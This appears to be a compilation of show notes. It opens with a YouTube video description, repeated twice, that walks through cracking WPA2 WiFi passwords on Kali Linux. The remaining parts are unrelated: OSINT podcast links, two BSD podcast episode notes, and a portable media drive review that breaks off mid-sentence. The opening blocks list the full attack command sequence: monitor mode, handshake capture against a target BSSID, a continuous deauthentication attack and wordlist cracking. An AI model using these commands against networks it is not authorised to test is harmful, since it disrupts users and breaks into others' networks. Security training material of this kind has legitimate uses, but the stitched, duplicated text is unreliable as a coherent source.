Full process using Kali Linux to crack WiFi passwords. I discuss network adapters, airmon-ng, airodump-ng, aircrack-ng and more in this video. Menu: Use airmon-ng to crack WiFi networks: 0:00 Network Adapter to use: 0:46 Kali Linux setup: 1:20 Plug in network adapter: 1:35 Verify that network adapter is recognized by Kali Linux: 2:04 WPA2 network to crack: 2:43 iwconfig: 3:27 Kali Version: 3:34 Kill conflicting processes with airmon-ng: 3:55 Put interface into monitor mode: 4:32 Discover WiFi Networks with airodump-ng: 5:15 Use airodump-ng to view only one network: 6:20 Connect to network using an iPhone: 6:39 airodump-ng capture WPA2 four way handshake: 6:58 Use aireplay-ng to deauthenticate clients: 7:25 WPA2 four way handshake captured: 8:08 Use Wireshark to view WPA2 four way handshake: 8:38 Put interface back into managed mode: 9:30 Crack WPA2 password with aircrack-ng: 10:10 Password cracked: 11:00 WiFi router WPA2 settings: 12:00 Summary: 12:40 ================ Network Adapters: ================ Alfa AWUS036NHA: https://amzn.to/3qbQGKN Alfa AWUSO36NH: https://amzn.to/3moeQiI ================ Commands used: ================ ! See version of Kali cat /etc/os-release uname -a ! See interfaces ip addr iwconfig !kill processes sudo airmon-ng check kill !Start monitor mode sudo airmon-ng start wlan0 !Verify that monitor mode is used sudo airmon-ng !You could also use iwconfig to check that interface is in monitor mode: iwconfig ! Get the AP's MAC address and channel sudo airodump-ng wlan0mon ! AP-MAC & channel - you need to select your own here: ESSID: 90:9A:4A:B8:F3:FB Channel used by AP for SSID: 2 !1st Window: !Make sure you replace the channel number and bssid with your own !Replace hack1 with your file name like capture1 or something sudo airodump-ng -w hack1 -c 2 --bssid 90:9A:4A:B8:F3:FB wlan0mon !2nd Window - deauth attack !Make sure you replace the bssid with your own sudo aireplay-ng --deauth 0 -a 90:9A:4A:B8:F3:FB wlan0mon !Use Wireshark to open hack file wireshark hack1-01.cap !Filter Wireshark messages for EAPOL eapol !Stop monitor mode airmon-ng stop wlan0mon !Crack file with Rock you or another wordlist !Make sure you have rockyou in text format (unzip file on Kali) !Replace hack1-01.cap with your file name aircrack-ng hack1-01.cap -w /usr/share/wordlists/rockyou.txt ================ Previous videos: ================ Kali Installation: https://youtu.be/VAMP8DqSDjg WPA2 GPU password cracking: https://youtu.be/J8A8rKFZW-M Wordlists (rockyou): https://youtu.be/rgWcguAg-XA ================ Connect with me: ================ Discord: https://discord.com/invite/usKSyzb Twitter: https://www.twitter.com/davidbombal Instagram: https://www.instagram.com/davidbombal LinkedIn: https://www.linkedin.com/in/davidbombal Facebook: https://www.facebook.com/davidbombal.co TikTok: http://tiktok.com/@davidbombal YouTube: https://www.youtube.com/davidbombal ================ Support me: ================ Buy my CCNA course and support me: DavidBombal.com: CCNA ($10): http://bit.ly/yt999ccna Udemy CCNA Course: https://bit.ly/ccnafor10dollars GNS3 CCNA Course: CCNA ($10): https://bit.ly/gns3ccna10 ====================== Special Offers: ====================== Boson software: 15% discount Link: bit.ly/boson15 Code: DBAF15P wifi kali linux kali linux 2020 kali linux 2020.4 wifite wpa wep wps alfa comptia ceh oscp wifi airmon-ng aircrack-ng hack hacker hacking ethical hacking kali ine Please note that links listed may be affiliate links and provide me with a small percentage/kickback should you use them to purchase any of the items listed or recommended. Thank you for supporting me and this channel!
Full process using Kali Linux to crack WiFi passwords. I discuss network adapters, airmon-ng, airodump-ng, aircrack-ng and more in this video. Menu: Use airmon-ng to crack WiFi networks: 0:00 Network Adapter to use: 0:46 Kali Linux setup: 1:20 Plug in network adapter: 1:35 Verify that network adapter is recognized by Kali Linux: 2:04 WPA2 network to crack: 2:43 iwconfig: 3:27 Kali Version: 3:34 Kill conflicting processes with airmon-ng: 3:55 Put interface into monitor mode: 4:32 Discover WiFi Networks with airodump-ng: 5:15 Use airodump-ng to view only one network: 6:20 Connect to network using an iPhone: 6:39 airodump-ng capture WPA2 four way handshake: 6:58 Use aireplay-ng to deauthenticate clients: 7:25 WPA2 four way handshake captured: 8:08 Use Wireshark to view WPA2 four way handshake: 8:38 Put interface back into managed mode: 9:30 Crack WPA2 password with aircrack-ng: 10:10 Password cracked: 11:00 WiFi router WPA2 settings: 12:00 Summary: 12:40 ================ Network Adapters: ================ Alfa AWUS036NHA: https://amzn.to/3qbQGKN Alfa AWUSO36NH: https://amzn.to/3moeQiI ================ Commands used: ================ ! See version of Kali cat /etc/os-release uname -a ! See interfaces ip addr iwconfig !kill processes sudo airmon-ng check kill !Start monitor mode sudo airmon-ng start wlan0 !Verify that monitor mode is used sudo airmon-ng !You could also use iwconfig to check that interface is in monitor mode: iwconfig ! Get the AP's MAC address and channel sudo airodump-ng wlan0mon ! AP-MAC & channel - you need to select your own here: ESSID: 90:9A:4A:B8:F3:FB Channel used by AP for SSID: 2 !1st Window: !Make sure you replace the channel number and bssid with your own !Replace hack1 with your file name like capture1 or something sudo airodump-ng -w hack1 -c 2 --bssid 90:9A:4A:B8:F3:FB wlan0mon !2nd Window - deauth attack !Make sure you replace the bssid with your own sudo aireplay-ng --deauth 0 -a 90:9A:4A:B8:F3:FB wlan0mon !Use Wireshark to open hack file wireshark hack1-01.cap !Filter Wireshark messages for EAPOL eapol !Stop monitor mode airmon-ng stop wlan0mon !Crack file with Rock you or another wordlist !Make sure you have rockyou in text format (unzip file on Kali) !Replace hack1-01.cap with your file name aircrack-ng hack1-01.cap -w /usr/share/wordlists/rockyou.txt ================ Previous videos: ================ Kali Installation: https://youtu.be/VAMP8DqSDjg WPA2 GPU password cracking: https://youtu.be/J8A8rKFZW-M Wordlists (rockyou): https://youtu.be/rgWcguAg-XA ================ Connect with me: ================ Discord: https://discord.com/invite/usKSyzb Twitter: https://www.twitter.com/davidbombal Instagram: https://www.instagram.com/davidbombal LinkedIn: https://www.linkedin.com/in/davidbombal Facebook: https://www.facebook.com/davidbombal.co TikTok: http://tiktok.com/@davidbombal YouTube: https://www.youtube.com/davidbombal ================ Support me: ================ Buy my CCNA course and support me: DavidBombal.com: CCNA ($10): http://bit.ly/yt999ccna Udemy CCNA Course: https://bit.ly/ccnafor10dollars GNS3 CCNA Course: CCNA ($10): https://bit.ly/gns3ccna10 ====================== Special Offers: ====================== Boson software: 15% discount Link: bit.ly/boson15 Code: DBAF15P wifi kali linux kali linux 2020 kali linux 2020.4 wifite wpa wep wps alfa comptia ceh oscp wifi airmon-ng aircrack-ng hack hacker hacking ethical hacking kali ine Please note that links listed may be affiliate links and provide me with a small percentage/kickback should you use them to purchase any of the items listed or recommended. Thank you for supporting me and this channel!
People in this Episode Micah Hoffman Dutch_Osintguy Sector035 And our special guest: Ritu Gill aka OsintTechniques Links to what we discussed Tweet by Gonzo about searching SSID's with a Google dork https://twitter.com/gonzos_int/status/1222541952413065216?s=11 Another good name check lookup website https://twitter.com/dutch_osintguy/status/1223688324034060292 Good read about deanonymizing TOR circuits https://twitter.com/x0rzkov/status/1224380928094613505 Guest OSINT Curious blog by Jeff Lomas https://twitter.com/BleuBloodHound : https://osintcurio.us/2020/01/31/combing-through-video-faster-using-dfir-and-osint-skills/ 50 cognitive biases in the modern world https://twitter.com/i_intelligence/status/1224230855213830145 OSINT explanation of Kobe Bryant's catastrophic helicopter crash https://www.youtube.com/watch?v=XSHpbGhy3Ko&feature=youtu.be How to find the most recent satellite imagery on earth https://twitter.com/mouthofmorrison/status/1212840820019208192 Trace Labs Global CTF 3 Google Geolocation API now includes Wi-Fi and Cell data https://developers.google.com/maps/documentation/geolocation/intro Tweet by Serge Courier: Scrape Google Maps (a tool and a browser extension to scrape results from a Google maps search – original blog post from Boolean Strings) https://twitter.com/secou/status/1225855494750818304?s=21 10 minute OSINT Curious tip “Viewing LinkedIn Profiles Anonymously” https://youtu.be/bIAdx3CAjtM Identifying and tackling manipulated media – a free online course offered by Reuters https://twitter.com/LorandBodo/status/1225415356409372672 OSINTCombine have put together an importable bookmark stack https://twitter.com/osintcombine/status/1225181330595430400 Ginger_T Article https://medium.com/@Ginger_T/my-journey-into-the-world-of-osint-is-now-just-over-one-year-old-ea6f6d90eda Self Promotion SANS OSINT Summit – February 18th, next week! https://www.sans.org/event/osint-summit-2020/summit-agenda Dutch_OsintGuy Nico doing two OSINT workshops on March 20th and May 18th Google Advanced Searching and Monitoring (in Dutch) https://www.aware-online.com/workshop-google-voor-gevorderden/ https://twitter.com/aware_online/status/1226504473310351360 Dutch_Osintguy Nico teaching in Amsterdam 21-22-23 OSINT module 1 in English --- Support this podcast: https://anchor.fm/osintcurious/support
This week we have a FreeBSD Foundation development update, tell you about sprinkling in the TrueOS project, Dynamic WDS & a whole lot more! This episode was brought to you by Headlines OpenSSH Removes SSHv1 Support (http://undeadly.org/cgi?action=article&sid=20170501005206) In a series of commits starting here (http://marc.info/?l=openbsd-cvs&m=149359384905651&w=2) and ending with this one (http://marc.info/?l=openbsd-cvs&m=149359530105864&w=2), Damien Miller completed the removal of all support for the now-historic SSHv1 protocol from OpenSSH (https://www.openssh.com/). The final commit message, for the commit that removes the SSHv1 related regression tests, reads: Eliminate explicit specification of protocol in tests and loops over protocol. We only support SSHv2 now. Dropping support for SSHv1 and associated ciphers that were either suspected to or known to be broken has been planned for several releases, and has been eagerly anticipated by many in the OpenBSD camp. In practical terms this means that starting with OpenBSD-current and snapshots as they will be very soon (and further down the road OpenBSD 6.2 with OpenSSH 7.6), the arcane options you used with ssh (http://man.openbsd.org/ssh) to connect to some end-of-life gear in a derelict data centre you don't want to visit anymore will no longer work and you will be forced do the reasonable thing. Upgrade. FreeBSD Foundation April 2017 Development Projects Update (https://www.freebsdfoundation.org/blog/april-2017-development-projects-update/) FreeBSD runs on many embedded boards that provide a USB target or USB On-the-Go (OTG) interface. This allows the embedded target to act as a USB device, and present one or more interfaces (USB device classes) to a USB host. That host could be running FreeBSD, Linux, Mac OS, Windows, Android, or another operating system. USB device classes include audio input or output (e.g. headphones), mass storage (USB flash drives), human interface device (keyboards, mice), communications (Ethernet adapters), and many others. The Foundation awarded a project grant to Edward Tomasz Napierała to develop a USB mass storage target driver, using the FreeBSD CAM Target Layer (CTL) as a backend. This project allows FreeBSD running on an embedded platform, such as a BeagleBone Black or Raspberry Pi Zero, to emulate a USB mass storage target, commonly known as a USB flash stick. The backing storage for the emulated mass storage target is on the embedded board's own storage media. It can be configured at runtime using the standard CTL configuration mechanism – the ctladm(8) utility, or the ctl.conf(5) file. The FreeBSD target can now present a mass storage interface, a serial interface (for a console on the embedded system), and an Ethernet interface for network access. A typical usage scenario for the mass storage interface is to provide users with documentation and drivers that can be accessed from their host system. This makes it easier for new users to interact with the embedded FreeBSD board, especially in cases where the host operating system may require drivers to access all of the functionality, as with Windows and OS X. They provide instructions on how to configure a BeagleBone Black to act as a flash memory stick attached to a host computer. +Check out the article, test, and report back your experiences with the new USB OTG interface. *** Spring cleaning: Hardware Update and Preview of upcoming TrueOS changes (https://www.trueos.org/blog/spring-cleaning-hardware-update-preview-upcoming-trueos-changes/) The much-abused TrueOS build server is experiencing some technical difficulties, slowing down building new packages and releasing updates. After some investigation, one problem seemed to be a bug with the Poudriere port building software. After updating builders to the new version, some of the instability is resolved. Thankfully, we won't have to rely on this server so much, because… We're getting new hardware! A TrueOS/Lumina contributor is donating a new(ish) server to the project. Special thanks to TrueOS contributor/developer q5sys for the awesome new hardware! Preview: UNSTABLE and Upcoming TrueOS STABLE update A fresh UNSTABLE release is dropping today, with a few key changes: Nvidia/graphics driver detection fixes. Boot environment listing fix (FreeBSD boot-loader only) Virtual box issues fixed on most systems. There appears to be a regression in VirtualBox 5.1 with some hardware. New icon themes for Lumina (Preferences -> Appearance -> Theme). Removal of legacy pc-diskmanager. It was broken and unmaintained, so it is time to remove it. Installer/.iso Changes (Available with new STABLE Update): The text installer has been removed. It was broken and unmaintained, so it is time to remove it. There is now a single TrueOS install image. You can still choose to install as either a server or desktop, but both options live in a single install image now. This image is still available as either an .iso or .img file. The size of the .iso and .img files is reduced about 500 Mb to around 2Gb total. We've removed Firefox and Thunderbird from the default desktop installation. These have been replaced with Qupzilla and Trojita. Note you can replace Qupzilla and Trojita with Firefox and Thunderbird via the SysAdm Appcafe after completing the TrueOS install. Grub is no longer an installation option. Instead, the FreeBSD boot-loader is always used for the TrueOS partition. rEFInd is used as the master boot-loader for multi-booting; EFI partitioning is required. Qpdfview is now preinstalled for pdf viewing. Included a slideshow during the installation with tips and screenshots. Interview - Patrick M. Hausen - hausen@punkt.de (mailto:hausen@punkt.de) Founder of Punkt.de HAST - Highly Available Storage (https://wiki.freebsd.org/HAST) News Roundup (finally) investigating how to get dynamic WDS (DWDS) working in FreeBSD! (http://adrianchadd.blogspot.com/2017/04/finally-investigating-how-to-get.html) Adrian Chadd writes in his blog: I sat down recently to figure out how to get dynamic WDS working on FreeBSD-HEAD. It's been in FreeBSD since forever, and it in theory should actually have just worked, but it's extremely not documented in any useful way. It's basically the same technology in earlier Apple Airports (before it grew into what the wireless tech world calls "Proxy-STA") and is what the "extender" technology on Qualcomm Atheros chipsets implement. A common question I get from people is "why can't I bridge multiple virtual machines on my laptop and have them show up over wifi? It works on ethernet!" And my response is "when I make dynamic WDS work, you can just make this work on FreeBSD devices - but for now, use NAT." That always makes people sad. + Goes on to explain that normal station/access point setups have up to three addresses and depending on the packet type, these can vary. There are a couple of variations in the addresses, which is more than the number of address fields in a normal 802.11 frame. The big note here is that there's not enough MAC addresses to say "please send this frame to a station MAC address, but then have them forward it to another MAC address attached behind it in a bridge." That would require 4 mac addresses in the 802.11 header, which we don't get. .. except we do. There's a separate address format where from-DS and to-DS bits in the header set to 1, which means "this frame is coming from distribution system to a distribution system", and it has four mac addresses. The RA is then the AP you're sending to, and then a fourth field indicates the eventual destination address that may be an ethernet device connected behind said STA. If you don't configure up WDS, then when you send frames from a station from a MAC address that isn't actually your 802.11 interface MAC address, the system would be confused. The STA wouldn't be able to transmit it easily, and the AP wouldn't know how to get back to your bridged ethernet addresses. The original WDS was a statically configured thing. [...] So for static configurations, this works great. You'd associate your extender AP as a station of the central AP, it'd use wpa_supplicant to setup encryption, then anything between that central AP and that extender AP (as a station) would be encrypted as normal station traffic (but, 4-address frame format.) But that's not very convenient. You have to statically configure everything, including telling your central AP about all of your satellite extender APs. If you want to replace your central AP, you have to reprogram all of your extenders to use the new MAC addresses. So, Sam Leffler came up with "dynamic WDS" - where you don't have to explicitly state the list of central/satellite APs. Instead, you configure a central AP as "dynamic WDS", and when a 4-address frame shows up from an associated station, it "promotes" it to a WDS peer for you. On the satellite AP, it will just find an AP to communicate to, and then assume it'll do WDS and start using 4-address frames. It's still a bit clunky (there's no beacon, probe request, etc IEs that say "I do dynamic WDS!" so you'd better make ALL your central APs a different SSID!) but it certainly is better than what we had. Firstly, there are scripts in src/tools/tools/net80211/ - setup.wdsmain and setup.wdsrelay. These scripts are .. well, the almost complete documentation on a dynamic WDS setup. The manpage doesn't go into anywhere near enough information. So I dug into it. It turns out that dynamic WDS uses a helper daemon - 'wlanwds' - which listens for dynamic WDS configuration changes and will do things for you. This is what runs on the central AP side. Then it started making sense! So far, so good. I followed that script, modified it a bit to use encryption, and .. well, it half worked. Association worked fine, but no traffic was passing. A little more digging showed the actual problem - the dynamic WDS example scripts are for an open/unencrypted network. If you are using an encrypted network, the central AP side needs to enable privacy on the virtual interfaces so traffic gets encrypted with the parent interface encryption keys. Now, I've only done enough testing to show that indeed it is working. I haven't done anything like pass lots of traffic via iperf, or have a mix of DWDS and normal STA peers, nor actually run it for longer than 5 minutes. I'm sure there will be issues to fix. However - I do need it at home, as I can't see the home AP from the upstairs room (and now you see why I care about DWDS!) and so when I start using it daily I'll fix whatever hilarity ensues. Why don't schools teach debugging? (https://danluu.com/teach-debugging/) A friend of mine and I couldn't understand why some people were having so much trouble; the material seemed like common sense. The Feynman Method was the only tool we needed. Write down the problem Think real hard Write down the solution The Feynman Method failed us on the last project: the design of a divider, a real-world-scale project an order of magnitude more complex than anything we'd been asked to tackle before. I understand now why half the class struggled with the earlier assignments. Without an explanation of how to systematically approach problems, anyone who didn't intuitively grasp the correct solution was in for a semester of frustration. People who were, like me, above average but not great, skated through most of the class and either got lucky or wasted a huge chunk of time on the final project. I've even seen people talented enough to breeze through the entire degree without ever running into a problem too big to intuitively understand; those people have a very bad time when they run into a 10 million line codebase in the real world. The more talented the engineer, the more likely they are to hit a debugging wall outside of school. It's one of the most fundamental skills in engineering: start at the symptom of a problem and trace backwards to find the source. It takes, at most, half an hour to teach the absolute basics – and even that little bit would be enough to save a significant fraction of those who wash out and switch to non-STEM majors. Why do we leave material out of classes and then fail students who can't figure out that material for themselves? Why do we make the first couple years of an engineering major some kind of hazing ritual, instead of simply teaching people what they need to know to be good engineers? For all the high-level talk about how we need to plug the leaks in our STEM education pipeline, not only are we not plugging the holes, we're proud of how fast the pipeline is leaking. FreeBSD: pNFS server for testing (https://lists.freebsd.org/pipermail/freebsd-fs/2017-April/024702.html) Rick Macklem has issued a call for testing his new pNFS server: I now have a pNFS server that I think is ready for testing/evaluation. It is basically a patched FreeBSD-current kernel plus nfsd daemon. If you are interested, some very basic notes on how it works and how to set it up are at: http://people.freebsd.org/~rmacklem/pnfs-planb-setup.txt (http://people.freebsd.org/~rmacklem/pnfs-planb-setup.txt) A Plan B pNFS service consists of a single MetaData Server (MDS) and K Data Servers (DS), all of which would be recent FreeBSD systems. Clients will mount the MDS as they would a single NFS server. When files are created, the MDS creates a file tree identical to what a single NFS server creates, except that all the regular (VREG) files will be empty. As such, if you look at the exported tree on the MDS directly on the MDS server (not via an NFS mount), the files will all be of size == 0. Each of these files will also have two extended attributes in the system attribute name space: pnfsd.dsfile - This extended attrbute stores the information that the MDS needs to find the data storage file on a DS for this file. pnfsd.dsattr - This extended attribute stores the Size, ModifyTime and Change attributes for the file. For each regular (VREG) file, the MDS creates a data storage file on one of the K DSs, in one of the dsNN directories. The name of this file is the file handle of the file on the MDS in hexadecimal. The DSs use 20 subdirectories named "ds0" to "ds19" so that no one directory gets too large. At this time, the MDS generates File Layout layouts to NFSv4.1 clients that know how to do pNFS. For NFS clients that do not support NFSv4.1 pNFS, there will be a performance hit, since the IO RPCs will be proxied by the MDS for the DS server the data storage file resides on. The current setup does not allow for redundant servers. If the MDS or any of the K DS servers fail, the entire pNFS service will be non-functional. Looking at creating mirrored DS servers is planned, but it may be a year or more before that is implemented. I am planning on using the Flex File Layout for this, since it supports client side mirroring, where the client will write to all mirrors concurrently. Beastie Bits Openbsd changes of note 620 (http://www.tedunangst.com/flak/post/openbsd-changes-of-note-620) Why Unix commands are short (http://www.catonmat.net/blog/why-unix-commands-are-short/) OPNsense 17.1.5 released (https://opnsense.org/opnsense-17-1-5-released/) Something for Apple dual-GPU users (http://lists.dragonflybsd.org/pipermail/commits/2017-April/625847.html) pkgsrcCon 2017 CFT (https://mail-index.netbsd.org/netbsd-advocacy/2017/05/01/msg000735.html) TrueOS/Lumina Dev Q&A: May 5th 2017 (https://discourse.trueos.org/t/trueos-lumina-dev-q-a-5-4-17/1347) Feedback/Questions Peter - Jails (http://dpaste.com/0J14HGJ#wrap) Andrew - Languages and University Courses (http://dpaste.com/31AVFSF#wrap) JuniorJobs (https://wiki.freebsd.org/JuniorJobs) Steve - TrueOS and Bootloader (http://dpaste.com/1BXVZSY#wrap) Ben - ZFS questions (http://dpaste.com/0R7AW2T#wrap) Steve - Linux Emulation (http://dpaste.com/3ZR7NCC#wrap)
This week on BSDNow, Allen is away in the UK (For BSDCam), but we still have a full episode for you! Don't miss our interview with This episode was brought to you by Headlines My two year journey to becoming an OS Developer (http://zinascii.com/2016/going-to-joyent.html) A blog post by Ryan Zezeski about how he ended doing OS Development instead of working on application We have featured his posts before, including The illumos SYSCALL Handler (http://zinascii.com/2016/the-illumos-syscall-handler.html) It started in the summer of 2014: I had just left Basho after 3.5 years of working on Riak, when I decided I wanted to become an OS developer. I purchased Solaris Internals, cloned illumos-gate, fired up cscope, and got to work. I hardly knew any C, x86 might as well have been Brainfuck, and, frankly, I knew shit about operating systems. But I was determined. I've always learned best by beating my head against something until it makes sense. I'm not a fast learner; I'm persistent. What others have in ability I make up for in effort. And when it comes to OS internals it's all about work ethic. The more you look, the more you realize it's just another program. The main difference being: it's the program all the other programs run on. My strategy: to pick something, anything, that looked interesting, and write a post describing how it works. I wrote several of these posts in 2014 and 2015. More important, it put me in touch with Roger Faulkner: the creator of truss(1), the Solaris process model, and the real /proc filesystem. At the time I didn't like my interaction with Roger. He explained, in what I would later find out to be his typical gruff manner, that I was wrong; so I concluded he is a prick. But over the years I realized that I was being a brat—he was trying to teach me something and I let my ego get in the way. I've come to view that interaction as a blessing. I interacted with one of the greats, a mentor of my mentor's mentor (a Great Great Mentor). A couple of weeks later something even more surreal happened, at illumos Day 2014. Bryan Cantrill was the last speaker of the day. One of my mentors and someone I admire greatly. He was there to regale us with the story of Joyent's resurrection of lx-branded zones: Linux system call emulation on top of the illumos kernel. But before he would do that he decided to speak about me! I couldn't believe it. I was so overwhelmed that I don't remember most of what he said. I was too busy flipping shit—Bryan Cantrill is on stage, in front of other kernel developers I look up to, saying my name. I was in a dream. It turns out, unknown to me at the time, that he wrote the POSIX queue code for both Solaris and QNX, which I wrote about. He compared me to the great expository technical writers Elliott Organick and Richard Stevens. And it was at this moment that I knew I could do this: I could become an OS developer. Never underestimate the effect kind words can have on someone that looks up to you. There is a lot more to the story, and it is definitely worth the read The story then goes on to talk about his recent run in with Bryan Cantrill > A week from now my two year journey to become an OS developer comes to an end; and a new chapter begins. I don't know what specific things I'm going to work on, but I'm sure it will push me to the limit. I look forward to the challenge. *** Version 1.0 of the Lumina Desktop released (https://lumina-desktop.org/version-1-0-0-released/) After 4 years of development, Lumina Desktop has now hit version 1.0! This release brings with it a slew of new features and support: Completely customizable interface! Rather than having to learn how to use a new layout, change the desktop to suit you instead! Simple shortcuts for any application! The “favorites” system makes it easy to find and launch applications at any time. Extremely lightweight! Allows applications to utilize more of your system hardware and revitalizes older systems! Multiple-monitor support! Each monitor is treated as an independent entity – making it great for presentation systems which use a temporary monitor or for workstations which utilize an array of monitors for various tasks. While originally developed on PC-BSD, it already has been ported to a variety of different platforms, including OpenBSD, DragonFly, NetBSD, Debian and Gentoo Lumina has become the defacto desktop environment for TrueOS (Formerly PC-BSD), and looks like will provide a solid framework to continue growing desktop features. *** n2k16 hackathon report: Ken Westerback on dhclient, bridges, routing and more (http://undeadly.org/cgi?action=article&sid=20160804200232) Next up, we have a report from Ken Westerback talking about the recent OpenBSD hackathon in Prague He starts by telling us about the work in bpf: First order of business, stsp@'s weird setup involving bridges and multiple dhclient clients. A bit of bpf(4) programming to restrict dhclient to handling ethernet packets unicast to its interface worked. Cool. Unfortunately it turned out some lazy dhcp servers always use ethernet broadcasts just because some lesser, non-OpenBSD clients ignore unicast packets until they have configured IP. Classic chicken and egg. So this was backed out just before 6.0. Sigh. Next up, he talks about an idea he had on the flight over, specifically with regard to how DHCP leases are stored, and how keeping the SSID information with them could speed up re-connection times, by only trying leases for current SSID's connected. After a day or so of hacking, it was working! However for $REASONS it was shelved for post 6.0, bummer! He then discusses an on-going project with Peter Hessler on passing along relevant PIDs in response to routing messages generated by kernel from ioctl events. This is something they've been hacking at, in order to allow dhclient to recognize its own routing messages. Sounds like they are both still works-in-progress. However, Ken did get something in for 6.0: Diving back into dhclient code I discovered that in situations where multiple offers were received the unused offers were not being declined and discarded. Despite a clear comment saying that's what was being done! Thus dhclient might gradually use up more and more memory. And possibly be retrying offers that should have been discarded. The fix for this did make 6.0! Yay! In Memoriam Roger Faulkner (https://www.usenix.org/memoriam-roger-faulkner) USENIX has re-released Roger Faulkner's original paper on /proc as a free download The UNIX community recently lost one of its original pioneers, Roger Faulkner, whom one commenter described as “The godfather of post-AT&T UNIX” In his memory, the USENIX group as re-released his original paper on the /proc file-system from 1991. Roger worked in many area's of UNIX, however the process file system /proc was his special baby. “/proc began as a debugger interface superseding ptrace(2) but has evolved into a general interface to the process model.” The original /proc only had a file for each process, not a directory. "Data may be transferred from or to any valid locations in the process's address space by applying lseek(2) to position the file at the virtual address of interest followed by read(2) or write(2)." Processes could be controlled using IOCTLs on the file As the USENIX article states: Roger believed that terrible things were sometimes required to create beautiful abstractions, and his trailblazing work on /proc embodies this burden: the innards may be delicate and nasty ("vile," as Roger might say in his distinguished Carolinian accent)—but the resulting abstractions are breathtaking in their power, scope and robustness. RIP Roger, and thanks for the wonderful UNIX legacy you've left us all. Interview - Myke Geiger - myke@servernorth.net (mailto:myke@servernorth.net) / @mWare (https://twitter.com/mWare) Using FreeBSD at a DSL/Cable ISP *** News Roundup New options in bsdinstall - some sysctls and date/time settings (https://www.reddit.com/r/freebsd/comments/4vxnw3/new_options_in_bsdinstall_some_sysctls_and/) bsdinstall in FreeBSD 11.0 will feature a number of new menus. The first, well allow you to set the date and time. Often on computers that have been in storage, or some embedded type devices that have no RTC, the date will be wildly wrong, and ntpd will refuse to run until the date is correctly set. This feature makes it easy to enter the date and time using dialog(1) The second menu, inspired by the existing ‘services' menu, offers a number of ‘hardening' options This menu allows users to easily enable a number of security features, including: Hide processes running as other users/groups Disable reading the kernel message buffer and debugging processes for unprivileged users Randomize the PID of newly created processes Enable the stack guard Erase /tmp at boot Disable remote syslog Disable sendmail All of these options are off by default, so that an install done with the installer will be the same as an install from source, or an upgrade. A number of these options are candidates to become on-by-default in the future, so the hope is that this menu will get more users to test these features and find any negative interactions with applications or general use, so they can be fixed. *** Rawrite32: the NetBSD image writing tool (https://www.netbsd.org/~martin/rawrite32/) Martin of the NetBSD project has released a new version of his USB imaging tool, rawrite32 For those who've not used this tool before, it is a Windows Application that allows writing NetBSD images directly to USB media (other other disk media) This update brings with it support for writing .xz file, and binary signing This may come in handy for writing other OS images to memory sticks as well, especially for those locked into a windows environment who need to switch. *** ZFS-Snap-Diff -- A pretty interface for viewing what changed after a ZFS snapshot (https://github.com/j-keck/zfs-snap-diff) There are lots of nice little utilities to help create and maintain your ZFS snapshots. However today we have something unique to look at, ‘zfs-snap-diff'. What makes it unique, is that it ships with a built-in golang / angularjs GUI for snapshot management It looks very powerful, including a built-in diff utility, so you can even see the changes in text-files, in addition to downloading files, restoring old versions and more. Its nice to see so many ZFS utilities starting to take off, and evolve file-management further. *** Dtrace Conf 2016 Event Videos (https://www.joyent.com/about/events/2016/dtrace-conf) The videos from Dtrace.conf 2016 have been posted Some highlights: Useful DTrace Intro CTF Everywhere Distributed DTrace DTrace for Apps DTrace json() subroutine Implementing (or not) fds[] in FreeBSD OpenDTrace DTrace performance improvements with always-on instrumentation D Syntactic Sugar DTrace and Go, DTrace and Postgres dtrace.conf(16) wrap-up by Bryan Cantrill (https://www.joyent.com/blog/dtrace-conf-16-wrap-up) Once again, it was an eclectic mix of technologists — and once again, the day got kicked off with me providing an introduction to dtrace.conf and its history. (Just to save you the time filling out your Cantrill Presentation Bingo Card: you can find me punching myself at 16:19, me offering unsolicited personal medical history at 20:11, and me getting trolled by unikernels at 38:25.) The next DTrace.conf isn't until 2020 *** Beastie Bits The BSD Daemon features in Mexican candy packaging (https://www.reddit.com/r/BSD/comments/4vngmw/the_bsd_daemon_feature_in_mexican_candy_packaging/) Remove PG_ZERO and zeroidle (page-zeroing) entirely (http://lists.dragonflybsd.org/pipermail/commits/2016-August/624202.html) OpenBSD: Release Songs: 6.0: "Black Hat" (https://www.openbsd.org/lyrics.html#60b) OpenBSD Gaming Resource (http://satterly.neocities.org/openbsd_games.html) LibreSSL 2.4.2 and 2.3.7 Released (http://bsdsec.net/articles/libressl-2-4-2-and-2-3-7-released) Feedback/Questions Pedja - Bhyve GUI (http://pastebin.com/LJcJmNsR) Tim - Jail Management (http://pastebin.com/259x94Rh) Don - X260 (http://pastebin.com/A86yHnzz) David - Updates (http://pastebin.com/wjtcuVSA) Ghislain - Jail Management (http://pastebin.com/DgH9G7p5) ***
Handheld Movie Server We both took vacations recently and decided to leave the laptops behind. But that didn't mean we didn't want to take our content with us. If you have an iPad you are limited to 64GB at present and with Andriod many devices allow you to add storage through SD cards. While that gives you a potentially unlimited amount of storage its impractical for large libraries. What are you to do? All (or most of your) Movies in the Palm of Your Hand Seagate has got you covered. They sell the Seagate Wireless Plus. Its a hard drive with a built in web server that can stream your content to all your mobile devices. The 1 Terabyte version sells for $160 (Buy Now). They also have a 500 GB and 2TB version selling for $140 and $199 respectively. Features: Wirelessly streams your favorite digital media to tablets, smartphones, computers and more Synchronizes with Dropbox and Google Drive to bring the cloud with you Streams up to three different HD movies to three devices at the same time Connects throughout your home to DLNA devices, Samsung Smart TVs, and AirPlay Integrates with the free Seagate Media app for iPad, iPhone, Kindle Fire, Windows 8/TR tablets and computers, and Android tablets and smartphones Delivers up to 10-hour battery life Setup The drive was connected to our home base computer and nearly 500GB of video and music were copied to it. The copy went pretty fast with the USB 3.0 interface. Since we were on a Mac we did have to reformat it so that both Macs and PCs could read and write to the drive when connected via USB. We copied the music to a music folder and the movies to a movie folder. When done the device indexes the content and presents the name and any album art that the file may have with it. We then disconnected and turned on the wifi feature and saw the Seagate Wireless Network show up when we scanned wifi networks. We connected with no issues and immediately were able to stream content via the Seagate app on our mobile devices. You can mix and match OS as well as mobile device platforms. The first thing we did was select the settings widget and change the SSID and add a password. If you are using the device where wifi is available you can have the Media Server share the internet connection so you don't lose Internet access while connected to it. Performance Navigation was simple, you can select content by Music, Movies, Photos, then by genres if you want. There is a nice search feature as well. Finally you can just browse the drives folders if you wish. Once the selection is made the media starts playing in a few seconds. On the airplane we had three people connected and we streamed HD content that was recorded at about 8Mbps. We observed no issues with the data whatsoever. On our cruise ship we had four people connected and had no issues either. You mileage may vary as that environment was pretty quiet as far as noise goes. The iOS app worked quite well but we seemed to like the web interface better. You simply put seagatewireless.com in the URL and you are presented with an interface that is similar to the app version. The battery life was nowhere near the 10 hours that is on the 